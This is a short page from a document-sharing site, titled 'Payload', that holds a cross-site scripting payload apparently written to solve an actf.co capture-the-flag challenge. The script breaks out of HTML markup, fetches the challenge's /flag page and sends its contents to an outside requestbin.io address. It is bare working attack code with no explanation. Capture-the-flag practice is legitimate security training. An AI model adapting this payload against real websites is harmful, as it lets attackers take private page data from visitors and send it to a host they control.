Payload

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

<>"'<script>

fetch('https://xtra-salty-sardines.web.actf.co/flag')
.then(response => response.text())
.then(flag
=>window.open("https://requestbin.io/um8ybzum?"+encodeURIComponent(flag),"_self"))

</script>

You might also like